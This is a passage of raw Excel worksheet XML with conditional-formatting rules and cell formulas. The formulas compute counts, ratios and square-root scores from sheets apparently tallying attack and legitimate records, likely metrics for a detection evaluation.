    <mergeCell ref="A1:A2"/>
    <mergeCell ref="B1:B2"/>
  </mergeCells>
  <conditionalFormatting sqref="K3:K78 Q3:Q78 W3:W78">
    <cfRule type="expression" dxfId="155" priority="58">
      <formula>IF(K3=1,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="154" priority="56">
      <formula>IF(K3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="153" priority="57">
      <formula>IF(K3=0,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L3:L78">
    <cfRule type="expression" dxfId="152" priority="37">
      <formula>IF(L3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="R3:R78">
    <cfRule type="expression" dxfId="151" priority="36">
      <formula>IF(R3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="X3:X78">
    <cfRule type="expression" dxfId="150" priority="35">
      <formula>IF(X3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="Y3:Y78">
    <cfRule type="expression" dxfId="149" priority="5">
      <formula>IF(Y3&lt;G3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="Z3">
    <cfRule type="expression" dxfId="148" priority="4">
      <formula>IF(Z3&lt;H3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AB3:AE78">
    <cfRule type="expression" dxfId="147" priority="1">
      <formula>IF(AB3&lt;J3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AC3:AC78">
    <cfRule type="expression" dxfId="146" priority="7">
      <formula>IF(AC3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="145" priority="8">
      <formula>IF(AC3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="144" priority="9">
      <formula>IF(AC3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AD3:AD78">
    <cfRule type="expression" dxfId="143" priority="6">
      <formula>IF(AD3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AF3">
    <cfRule type="expression" dxfId="142" priority="22">
      <formula>IF(AF3&lt;N3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AH3:AK78">
    <cfRule type="expression" dxfId="141" priority="14">
      <formula>IF(AH3&lt;P3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AI3:AI78">
    <cfRule type="expression" dxfId="140" priority="25">
      <formula>IF(AI3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="139" priority="26">
      <formula>IF(AI3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="138" priority="27">
      <formula>IF(AI3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AJ3:AJ78">
    <cfRule type="expression" dxfId="137" priority="24">
      <formula>IF(AJ3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AL3">
    <cfRule type="expression" dxfId="136" priority="13">
      <formula>IF(AL3&lt;T3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AN3:AP78">
    <cfRule type="expression" dxfId="135" priority="10">
      <formula>IF(AN3&lt;V3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AO3:AO78">
    <cfRule type="expression" dxfId="134" priority="16">
      <formula>IF(AO3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="133" priority="17">
      <formula>IF(AO3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="132" priority="18">
      <formula>IF(AO3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AP3:AP78">
    <cfRule type="expression" dxfId="131" priority="15">
      <formula>IF(AP3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AU3:AU78 BA3:BA78">
    <cfRule type="expression" dxfId="130" priority="53">
      <formula>IF(AU3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="129" priority="54">
      <formula>IF(AU3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="128" priority="55">
      <formula>IF(AU3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AV3:AV78">
    <cfRule type="expression" dxfId="127" priority="34">
      <formula>IF(AV3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BB3:BB78">
    <cfRule type="expression" dxfId="126" priority="33">
      <formula>IF(BB3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BG3:BG78">
    <cfRule type="expression" dxfId="125" priority="51">
      <formula>IF(BG3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="124" priority="52">
      <formula>IF(BG3=1,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="123" priority="50">
      <formula>IF(BG3=0.5,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BH3:BH78">
    <cfRule type="expression" dxfId="122" priority="32">
      <formula>IF(BH3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BM3:BM78">
    <cfRule type="expression" dxfId="121" priority="40">
      <formula>IF(BM3=1,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="120" priority="38">
      <formula>IF(BM3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="119" priority="39">
      <formula>IF(BM3=0,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BN3:BN78">
    <cfRule type="expression" dxfId="118" priority="31">
      <formula>IF(BN3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BT3:BT78">
    <cfRule type="expression" dxfId="117" priority="42">
      <formula>IF(BT3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="116" priority="43">
      <formula>IF(BT3=1,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="115" priority="41">
      <formula>IF(BT3=0.5,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BU3:BU78">
    <cfRule type="expression" dxfId="114" priority="30">
      <formula>IF(BU3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BZ3:BZ78">
    <cfRule type="expression" dxfId="113" priority="44">
      <formula>IF(BZ3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="112" priority="45">
      <formula>IF(BZ3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="111" priority="46">
      <formula>IF(BZ3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="CA3:CA78">
    <cfRule type="expression" dxfId="110" priority="29">
      <formula>IF(CA3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="CG3:CG78">
    <cfRule type="expression" dxfId="109" priority="47">
      <formula>IF(CG3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="108" priority="48">
      <formula>IF(CG3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="107" priority="49">
      <formula>IF(CG3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="CH3:CH78">
    <cfRule type="expression" dxfId="106" priority="28">
      <formula>IF(CH3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" scale="1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8">
    <tabColor rgb="FFC00000"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:S36"/>
  <sheetViews>
    <sheetView zoomScale="130" zoomScaleNormal="130" workbookViewId="0">
      <pane xSplit="1" ySplit="2" topLeftCell="K3" activePane="bottomRight" state="frozen"/>
      <selection activeCell="Q6" sqref="Q6"/>
      <selection pane="topRight" activeCell="Q6" sqref="Q6"/>
      <selection pane="bottomLeft" activeCell="Q6" sqref="Q6"/>
      <selection pane="bottomRight" activeCell="A18" sqref="A18:N18"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11.42578125" defaultRowHeight="12.75"/>
  <cols>
    <col min="1" max="1" width="25.140625" style="26" customWidth="1"/>
    <col min="2" max="2" width="11" style="26" hidden="1" customWidth="1"/>
    <col min="3" max="3" width="11.42578125" style="26" hidden="1" customWidth="1"/>
    <col min="4" max="4" width="11" style="26" hidden="1" customWidth="1"/>
    <col min="5" max="5" width="11.42578125" style="26" hidden="1" customWidth="1"/>
    <col min="6" max="7" width="11" style="26" hidden="1" customWidth="1"/>
    <col min="8" max="8" width="11.42578125" style="26" hidden="1" customWidth="1"/>
    <col min="9" max="9" width="11" style="26" hidden="1" customWidth="1"/>
    <col min="10" max="10" width="11.85546875" style="214" hidden="1" customWidth="1"/>
    <col min="11" max="11" width="15" style="26" customWidth="1"/>
    <col min="12" max="12" width="22.28515625" style="26" customWidth="1"/>
    <col min="13" max="13" width="15.85546875" style="26" customWidth="1"/>
    <col min="14" max="14" width="28.5703125" style="26" customWidth="1"/>
    <col min="15" max="15" width="14.5703125" style="26" customWidth="1"/>
    <col min="16" max="16384" width="11.42578125" style="26"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:19">
      <c r="A1" s="146"/>
      <c r="B1" s="713" t="s">
        <v>2348</v>
      </c>
      <c r="C1" s="714"/>
      <c r="D1" s="714"/>
      <c r="E1" s="714"/>
      <c r="F1" s="714"/>
      <c r="G1" s="714"/>
      <c r="H1" s="714"/>
      <c r="I1" s="714"/>
      <c r="J1" s="714"/>
      <c r="K1" s="701" t="s">
        <v>680</v>
      </c>
      <c r="L1" s="702"/>
      <c r="M1" s="703" t="s">
        <v>681</v>
      </c>
      <c r="N1" s="704"/>
    </row>
    <row r="2" spans="1:19" ht="25.5" customHeight="1" thickBot="1">
      <c r="A2" s="442" t="s">
        <v>641</v>
      </c>
      <c r="B2" s="438" t="s">
        <v>0</v>
      </c>
      <c r="C2" s="21" t="s">
        <v>1</v>
      </c>
      <c r="D2" s="21" t="s">
        <v>2</v>
      </c>
      <c r="E2" s="21" t="s">
        <v>3</v>
      </c>
      <c r="F2" s="21" t="s">
        <v>1758</v>
      </c>
      <c r="G2" s="21" t="s">
        <v>1759</v>
      </c>
      <c r="H2" s="21" t="s">
        <v>1760</v>
      </c>
      <c r="I2" s="21" t="s">
        <v>1761</v>
      </c>
      <c r="J2" s="310" t="s">
        <v>1762</v>
      </c>
      <c r="K2" s="416" t="s">
        <v>2350</v>
      </c>
      <c r="L2" s="417" t="s">
        <v>2470</v>
      </c>
      <c r="M2" s="419" t="s">
        <v>2350</v>
      </c>
      <c r="N2" s="420" t="s">
        <v>2471</v>
      </c>
      <c r="S2" s="214"/>
    </row>
    <row r="3" spans="1:19" ht="15" customHeight="1">
      <c r="A3" s="443" t="s">
        <v>4463</v>
      </c>
      <c r="B3" s="717">
        <f>'T2 (At) FG&gt;=5'!$E$79</f>
        <v>3573695</v>
      </c>
      <c r="C3" s="717"/>
      <c r="D3" s="717"/>
      <c r="E3" s="717"/>
      <c r="F3" s="717"/>
      <c r="G3" s="717"/>
      <c r="H3" s="717"/>
      <c r="I3" s="717"/>
      <c r="J3" s="717"/>
      <c r="K3" s="717"/>
      <c r="L3" s="717"/>
      <c r="M3" s="717"/>
      <c r="N3" s="718"/>
      <c r="S3" s="214"/>
    </row>
    <row r="4" spans="1:19" ht="15" customHeight="1">
      <c r="A4" s="444" t="s">
        <v>4464</v>
      </c>
      <c r="B4" s="719">
        <f>'Tabla 3 (Legítimo)'!$B$3</f>
        <v>78694206</v>
      </c>
      <c r="C4" s="719"/>
      <c r="D4" s="719"/>
      <c r="E4" s="719"/>
      <c r="F4" s="719"/>
      <c r="G4" s="719"/>
      <c r="H4" s="719"/>
      <c r="I4" s="719"/>
      <c r="J4" s="719"/>
      <c r="K4" s="719"/>
      <c r="L4" s="719"/>
      <c r="M4" s="719"/>
      <c r="N4" s="720"/>
      <c r="S4" s="214"/>
    </row>
    <row r="5" spans="1:19" ht="15" customHeight="1" thickBot="1">
      <c r="A5" s="445" t="s">
        <v>4465</v>
      </c>
      <c r="B5" s="719">
        <f>$B$4+$B$3</f>
        <v>82267901</v>
      </c>
      <c r="C5" s="719"/>
      <c r="D5" s="719"/>
      <c r="E5" s="719"/>
      <c r="F5" s="719"/>
      <c r="G5" s="719"/>
      <c r="H5" s="719"/>
      <c r="I5" s="719"/>
      <c r="J5" s="719"/>
      <c r="K5" s="719"/>
      <c r="L5" s="719"/>
      <c r="M5" s="719"/>
      <c r="N5" s="720"/>
      <c r="O5" s="725" t="s">
        <v>658</v>
      </c>
      <c r="P5" s="726"/>
      <c r="S5" s="214"/>
    </row>
    <row r="6" spans="1:19" ht="15" customHeight="1">
      <c r="A6" s="478" t="s">
        <v>4453</v>
      </c>
      <c r="B6" s="439"/>
      <c r="C6" s="44"/>
      <c r="D6" s="44"/>
      <c r="E6" s="482"/>
      <c r="F6" s="482"/>
      <c r="G6" s="482"/>
      <c r="H6" s="44"/>
      <c r="I6" s="44"/>
      <c r="J6" s="44"/>
      <c r="K6" s="433">
        <f>SUMPRODUCT('T2 (At) FG&gt;=5'!$D3:$D$78,'T2 (At) FG&gt;=5'!BM3:BM78)</f>
        <v>22</v>
      </c>
      <c r="L6" s="307">
        <f>SUMPRODUCT('T2 (At) FG&gt;=5'!$D3:$D$78,'T2 (At) FG&gt;=5'!BT3:BT78)</f>
        <v>90.333333333333329</v>
      </c>
      <c r="M6" s="433">
        <f>SUMPRODUCT('T2 (At) FG&gt;=5'!$D3:$D$78,'T2 (At) FG&gt;=5'!BZ3:BZ78)</f>
        <v>14</v>
      </c>
      <c r="N6" s="307">
        <f>SUMPRODUCT('T2 (At) FG&gt;=5'!$D3:$D$78,'T2 (At) FG&gt;=5'!CG3:CG78)</f>
        <v>15</v>
      </c>
      <c r="O6" s="723" t="s">
        <v>667</v>
      </c>
      <c r="P6" s="724"/>
      <c r="S6" s="214"/>
    </row>
    <row r="7" spans="1:19" ht="15" customHeight="1">
      <c r="A7" s="479" t="s">
        <v>4454</v>
      </c>
      <c r="B7" s="440"/>
      <c r="C7" s="284"/>
      <c r="D7" s="284"/>
      <c r="E7" s="284"/>
      <c r="F7" s="284"/>
      <c r="G7" s="284"/>
      <c r="H7" s="284"/>
      <c r="I7" s="284"/>
      <c r="J7" s="284"/>
      <c r="K7" s="434">
        <f>'T2 (At) FG&gt;=5'!$D$79 - K6</f>
        <v>88</v>
      </c>
      <c r="L7" s="435">
        <f>'T2 (At) FG&gt;=5'!$D$79 - L6</f>
        <v>19.666666666666671</v>
      </c>
      <c r="M7" s="434">
        <f>'T2 (At) FG&gt;=5'!$D$79 - M6</f>
        <v>96</v>
      </c>
      <c r="N7" s="435">
        <f>'T2 (At) FG&gt;=5'!$D$79 - N6</f>
        <v>95</v>
      </c>
      <c r="O7" s="723"/>
      <c r="P7" s="724"/>
      <c r="S7" s="214"/>
    </row>
    <row r="8" spans="1:19" ht="15" customHeight="1">
      <c r="A8" s="446" t="s">
        <v>4148</v>
      </c>
      <c r="B8" s="519"/>
      <c r="C8" s="520"/>
      <c r="D8" s="520"/>
      <c r="E8" s="586"/>
      <c r="F8" s="586"/>
      <c r="G8" s="586"/>
      <c r="H8" s="520"/>
      <c r="I8" s="284"/>
      <c r="J8" s="304"/>
      <c r="K8" s="460">
        <f>'T2 (At) FG&gt;=5'!BI79</f>
        <v>86</v>
      </c>
      <c r="L8" s="308">
        <f>'T2 (At) FG&gt;=5'!BO79</f>
        <v>353816</v>
      </c>
      <c r="M8" s="460">
        <f>'T2 (At) FG&gt;=5'!BV79</f>
        <v>32</v>
      </c>
      <c r="N8" s="308">
        <f>'T2 (At) FG&gt;=5'!CB79</f>
        <v>34</v>
      </c>
      <c r="O8" s="556"/>
      <c r="S8" s="214"/>
    </row>
    <row r="9" spans="1:19" ht="15" customHeight="1" thickBot="1">
      <c r="A9" s="565" t="s">
        <v>4455</v>
      </c>
      <c r="B9" s="523"/>
      <c r="C9" s="524"/>
      <c r="D9" s="524"/>
      <c r="E9" s="587"/>
      <c r="F9" s="587"/>
      <c r="G9" s="587"/>
      <c r="H9" s="524"/>
      <c r="I9" s="285"/>
      <c r="J9" s="306"/>
      <c r="K9" s="461">
        <f>'T2 (At) FG&gt;=5'!BJ79</f>
        <v>45</v>
      </c>
      <c r="L9" s="461">
        <f>'T2 (At) FG&gt;=5'!BP79</f>
        <v>342838</v>
      </c>
      <c r="M9" s="461">
        <f>'T2 (At) FG&gt;=5'!BW79</f>
        <v>30</v>
      </c>
      <c r="N9" s="461">
        <f>'T2 (At) FG&gt;=5'!CC79</f>
        <v>31</v>
      </c>
      <c r="O9" s="554"/>
      <c r="S9" s="214"/>
    </row>
    <row r="10" spans="1:19" ht="15" customHeight="1" thickTop="1">
      <c r="A10" s="562" t="s">
        <v>4451</v>
      </c>
      <c r="B10" s="481"/>
      <c r="C10" s="482"/>
      <c r="D10" s="482"/>
      <c r="E10" s="482"/>
      <c r="F10" s="482"/>
      <c r="G10" s="482"/>
      <c r="H10" s="482"/>
      <c r="I10" s="43"/>
      <c r="J10" s="305"/>
      <c r="K10" s="521">
        <f>'Tabla 3 (Legítimo)'!K$56</f>
        <v>186956</v>
      </c>
      <c r="L10" s="522">
        <f>'Tabla 3 (Legítimo)'!L$56</f>
        <v>13158924</v>
      </c>
      <c r="M10" s="521">
        <f>'Tabla 3 (Legítimo)'!M$56</f>
        <v>27</v>
      </c>
      <c r="N10" s="522">
        <f>'Tabla 3 (Legítimo)'!N$56</f>
        <v>27</v>
      </c>
      <c r="O10" s="723" t="s">
        <v>668</v>
      </c>
      <c r="P10" s="724"/>
      <c r="S10" s="214"/>
    </row>
    <row r="11" spans="1:19" ht="15" customHeight="1">
      <c r="A11" s="563" t="s">
        <v>4452</v>
      </c>
      <c r="B11" s="440"/>
      <c r="C11" s="284"/>
      <c r="D11" s="284"/>
      <c r="E11" s="284"/>
      <c r="F11" s="284"/>
      <c r="G11" s="284"/>
      <c r="H11" s="284"/>
      <c r="I11" s="284"/>
      <c r="J11" s="304"/>
      <c r="K11" s="434">
        <f>'Tabla 3 (Legítimo)'!K57</f>
        <v>78507250</v>
      </c>
      <c r="L11" s="435">
        <f>'Tabla 3 (Legítimo)'!L57</f>
        <v>65535282</v>
      </c>
      <c r="M11" s="434">
        <f>'Tabla 3 (Legítimo)'!M57</f>
        <v>78694179</v>
      </c>
      <c r="N11" s="435">
        <f>'Tabla 3 (Legítimo)'!N57</f>
        <v>78694179</v>
      </c>
      <c r="O11" s="723"/>
      <c r="P11" s="724"/>
      <c r="S11" s="214"/>
    </row>
    <row r="12" spans="1:19" ht="15" customHeight="1">
      <c r="A12" s="446" t="s">
        <v>4149</v>
      </c>
      <c r="B12" s="440"/>
      <c r="C12" s="284"/>
      <c r="D12" s="284"/>
      <c r="E12" s="586"/>
      <c r="F12" s="586"/>
      <c r="G12" s="586"/>
      <c r="H12" s="284"/>
      <c r="I12" s="284"/>
      <c r="J12" s="304"/>
      <c r="K12" s="460">
        <f>'Tabla 3 (Legítimo)'!K52</f>
        <v>189068</v>
      </c>
      <c r="L12" s="308">
        <f>'Tabla 3 (Legítimo)'!L52</f>
        <v>14371055</v>
      </c>
      <c r="M12" s="460">
        <f>'Tabla 3 (Legítimo)'!M52</f>
        <v>27</v>
      </c>
      <c r="N12" s="308">
        <f>'Tabla 3 (Legítimo)'!N52</f>
        <v>27</v>
      </c>
      <c r="O12" s="555"/>
      <c r="S12" s="214"/>
    </row>
    <row r="13" spans="1:19" ht="15" customHeight="1" thickBot="1">
      <c r="A13" s="565" t="s">
        <v>4456</v>
      </c>
      <c r="B13" s="441"/>
      <c r="C13" s="285"/>
      <c r="D13" s="285"/>
      <c r="E13" s="592"/>
      <c r="F13" s="592"/>
      <c r="G13" s="592"/>
      <c r="H13" s="285"/>
      <c r="I13" s="285"/>
      <c r="J13" s="306"/>
      <c r="K13" s="461">
        <f>'Tabla 3 (Legítimo)'!K53</f>
        <v>186956</v>
      </c>
      <c r="L13" s="309">
        <f>'Tabla 3 (Legítimo)'!L53</f>
        <v>14155132</v>
      </c>
      <c r="M13" s="461">
        <f>'Tabla 3 (Legítimo)'!M53</f>
        <v>27</v>
      </c>
      <c r="N13" s="309">
        <f>'Tabla 3 (Legítimo)'!N53</f>
        <v>27</v>
      </c>
      <c r="S13" s="214"/>
    </row>
    <row r="14" spans="1:19" ht="15" customHeight="1" thickTop="1">
      <c r="A14" s="480" t="s">
        <v>638</v>
      </c>
      <c r="B14" s="534"/>
      <c r="C14" s="535"/>
      <c r="D14" s="535"/>
      <c r="E14" s="588"/>
      <c r="F14" s="588"/>
      <c r="G14" s="588"/>
      <c r="H14" s="535"/>
      <c r="I14" s="535"/>
      <c r="J14" s="538"/>
      <c r="K14" s="539">
        <f>K6/'T2 (At) FG&gt;=5'!$D$79</f>
        <v>0.2</v>
      </c>
      <c r="L14" s="540">
        <f>L6/'T2 (At) FG&gt;=5'!$D$79</f>
        <v>0.82121212121212117</v>
      </c>
      <c r="M14" s="539">
        <f>M6/'T2 (At) FG&gt;=5'!$D$79</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="N14" s="540">
        <f>N6/'T2 (At) FG&gt;=5'!$D$79</f>
        <v>0.13636363636363635</v>
      </c>
      <c r="O14" s="262"/>
      <c r="S14" s="214"/>
    </row>
    <row r="15" spans="1:19" ht="15" customHeight="1" thickBot="1">
      <c r="A15" s="564" t="s">
        <v>639</v>
      </c>
      <c r="B15" s="593"/>
      <c r="C15" s="589"/>
      <c r="D15" s="589"/>
      <c r="E15" s="591"/>
      <c r="F15" s="591"/>
      <c r="G15" s="591"/>
      <c r="H15" s="589"/>
      <c r="I15" s="589"/>
      <c r="J15" s="590"/>
      <c r="K15" s="541">
        <f>K10/$B$4</f>
        <v>2.3757276361616761E-3</v>
      </c>
      <c r="L15" s="542">
        <f>L10/$B$4</f>
        <v>0.16721591930160654</v>
      </c>
      <c r="M15" s="541">
        <f>M10/$B$4</f>
        <v>3.4310022773468226E-7</v>
      </c>
      <c r="N15" s="542">
        <f>N10/$B$4</f>
        <v>3.4310022773468226E-7</v>
      </c>
      <c r="O15" s="262"/>
      <c r="S15" s="214"/>
    </row>
    <row r="16" spans="1:19" ht="15" customHeight="1" thickTop="1" thickBot="1">
      <c r="A16" s="447" t="s">
        <v>640</v>
      </c>
      <c r="B16" s="536"/>
      <c r="C16" s="537"/>
      <c r="D16" s="537"/>
      <c r="E16" s="537"/>
      <c r="F16" s="537"/>
      <c r="G16" s="537"/>
      <c r="H16" s="537"/>
      <c r="I16" s="537"/>
      <c r="J16" s="543"/>
      <c r="K16" s="544">
        <f>SQRT(K14*(1-K15))</f>
        <v>0.44668205076180045</v>
      </c>
      <c r="L16" s="545">
        <f>SQRT(L14*(1-L15))</f>
        <v>0.82697786029736853</v>
      </c>
      <c r="M16" s="544">
        <f>SQRT(M14*(1-M15))</f>
        <v>0.35675297280530899</v>
      </c>
      <c r="N16" s="545">
        <f>SQRT(N14*(1-N15))</f>
        <v>0.36927440958891483</v>
      </c>
      <c r="S16" s="214"/>
    </row>
    <row r="17" spans="1:17" ht="15" customHeight="1" thickTop="1">
      <c r="A17" s="525" t="s">
        <v>4915</v>
      </c>
      <c r="B17" s="594"/>
      <c r="C17" s="595"/>
      <c r="D17" s="595"/>
      <c r="E17" s="595"/>
      <c r="F17" s="595"/>
      <c r="G17" s="595"/>
      <c r="H17" s="595"/>
      <c r="I17" s="595"/>
      <c r="J17" s="596"/>
      <c r="K17" s="526">
        <f t="shared" ref="K17:N18" si="0">K12/K8</f>
        <v>2198.4651162790697</v>
      </c>
      <c r="L17" s="527">
        <f t="shared" si="0"/>
        <v>40.617312388360048</v>
      </c>
      <c r="M17" s="526">
        <f t="shared" si="0"/>
        <v>0.84375</v>
      </c>
      <c r="N17" s="527">
        <f t="shared" si="0"/>
        <v>0.79411764705882348</v>
      </c>
    </row>
    <row r="18" spans="1:17" ht="15" customHeight="1" thickBot="1">
      <c r="A18" s="566" t="s">
        <v>4916</v>
      </c>
      <c r="B18" s="528"/>
      <c r="C18" s="597"/>
      <c r="D18" s="597"/>
      <c r="E18" s="597"/>
      <c r="F18" s="597"/>
      <c r="G18" s="597"/>
      <c r="H18" s="597"/>
      <c r="I18" s="597"/>
      <c r="J18" s="529"/>
      <c r="K18" s="528">
        <f t="shared" si="0"/>
        <v>4154.5777777777776</v>
      </c>
      <c r="L18" s="529">
        <f t="shared" si="0"/>
        <v>41.288106919302997</v>
      </c>
      <c r="M18" s="528">
        <f t="shared" si="0"/>
        <v>0.9</v>
      </c>
      <c r="N18" s="529">
        <f t="shared" si="0"/>
        <v>0.87096774193548387</v>
      </c>
    </row>
    <row r="19" spans="1:17" ht="26.45" customHeight="1" thickTop="1">
      <c r="A19" s="24"/>
      <c r="B19" s="573"/>
      <c r="C19" s="24"/>
      <c r="D19" s="24"/>
      <c r="E19" s="23" t="s">
        <v>669</v>
      </c>
      <c r="F19" s="24"/>
      <c r="G19" s="24"/>
      <c r="H19" s="24"/>
      <c r="I19" s="24"/>
      <c r="J19" s="574"/>
      <c r="K19" s="722"/>
      <c r="L19" s="722"/>
      <c r="M19" s="722"/>
      <c r="N19" s="722"/>
      <c r="O19" s="722"/>
      <c r="P19" s="722"/>
      <c r="Q19" s="722"/>
    </row>
    <row r="20" spans="1:17">
      <c r="A20" s="24"/>
      <c r="B20" s="24"/>
      <c r="C20" s="24"/>
      <c r="D20" s="24"/>
      <c r="E20" s="24"/>
      <c r="F20" s="24"/>
      <c r="G20" s="24"/>
      <c r="H20" s="24"/>
      <c r="I20" s="24"/>
      <c r="J20" s="575" t="s">
        <v>657</v>
      </c>
    </row>
    <row r="21" spans="1:17" ht="23.25" customHeight="1">
      <c r="A21" s="716" t="s">
        <v>670</v>
      </c>
      <c r="B21" s="716"/>
      <c r="C21" s="716"/>
      <c r="D21" s="716"/>
      <c r="E21" s="23" t="s">
        <v>648</v>
      </c>
      <c r="F21" s="24"/>
      <c r="G21" s="24"/>
      <c r="H21" s="23" t="s">
        <v>649</v>
      </c>
      <c r="I21" s="24"/>
      <c r="J21" s="25" t="s">
        <v>654</v>
      </c>
      <c r="K21" s="23" t="s">
        <v>642</v>
      </c>
      <c r="L21" s="23"/>
      <c r="M21" s="23"/>
    </row>
    <row r="22" spans="1:17" ht="25.5" customHeight="1">
      <c r="A22" s="23" t="s">
        <v>671</v>
      </c>
      <c r="B22" s="24"/>
      <c r="C22" s="24"/>
      <c r="D22" s="24"/>
      <c r="E22" s="23" t="s">
        <v>659</v>
      </c>
      <c r="F22" s="24"/>
      <c r="G22" s="24"/>
      <c r="H22" s="23" t="s">
        <v>660</v>
      </c>
      <c r="I22" s="24"/>
      <c r="J22" s="25" t="s">
        <v>655</v>
      </c>
      <c r="K22" s="23" t="s">
        <v>647</v>
      </c>
      <c r="L22" s="23"/>
      <c r="M22" s="23"/>
    </row>
    <row r="23" spans="1:17">
      <c r="A23" s="715" t="s">
        <v>672</v>
      </c>
      <c r="B23" s="715"/>
      <c r="C23" s="715"/>
      <c r="D23" s="715"/>
      <c r="E23" s="23" t="s">
        <v>650</v>
      </c>
      <c r="F23" s="24"/>
      <c r="G23" s="24"/>
      <c r="H23" s="23" t="s">
        <v>651</v>
      </c>
      <c r="I23" s="24"/>
      <c r="J23" s="25" t="s">
        <v>656</v>
      </c>
      <c r="K23" s="23" t="s">
        <v>643</v>
      </c>
      <c r="L23" s="23"/>
      <c r="M23" s="23"/>
    </row>
    <row r="24" spans="1:17">
      <c r="A24" s="24"/>
      <c r="B24" s="24"/>
      <c r="C24" s="24"/>
      <c r="D24" s="24"/>
      <c r="E24" s="24"/>
      <c r="F24" s="24"/>
      <c r="G24" s="24"/>
      <c r="H24" s="24"/>
      <c r="I24" s="24"/>
      <c r="J24" s="25"/>
      <c r="K24" s="24"/>
      <c r="L24" s="24"/>
      <c r="M24" s="24"/>
    </row>
    <row r="25" spans="1:17">
      <c r="A25" s="23" t="s">
        <v>661</v>
      </c>
      <c r="B25" s="24"/>
      <c r="C25" s="24"/>
      <c r="D25" s="24"/>
      <c r="E25" s="24"/>
      <c r="F25" s="24"/>
      <c r="G25" s="24"/>
      <c r="H25" s="24"/>
      <c r="I25" s="24"/>
      <c r="J25" s="25"/>
      <c r="K25" s="24"/>
      <c r="L25" s="24"/>
      <c r="M25" s="24"/>
    </row>
    <row r="26" spans="1:17">
      <c r="A26" s="23" t="s">
        <v>662</v>
      </c>
      <c r="B26" s="24"/>
      <c r="C26" s="24"/>
      <c r="D26" s="24"/>
      <c r="E26" s="23" t="s">
        <v>652</v>
      </c>
      <c r="F26" s="24"/>
      <c r="G26" s="24"/>
      <c r="H26" s="23" t="s">
        <v>653</v>
      </c>
      <c r="I26" s="24"/>
      <c r="J26" s="25" t="s">
        <v>656</v>
      </c>
      <c r="K26" s="23" t="s">
        <v>644</v>
      </c>
      <c r="L26" s="23"/>
      <c r="M26" s="23"/>
    </row>
    <row r="27" spans="1:17">
      <c r="A27" s="24" t="s">
        <v>645</v>
      </c>
      <c r="B27" s="24"/>
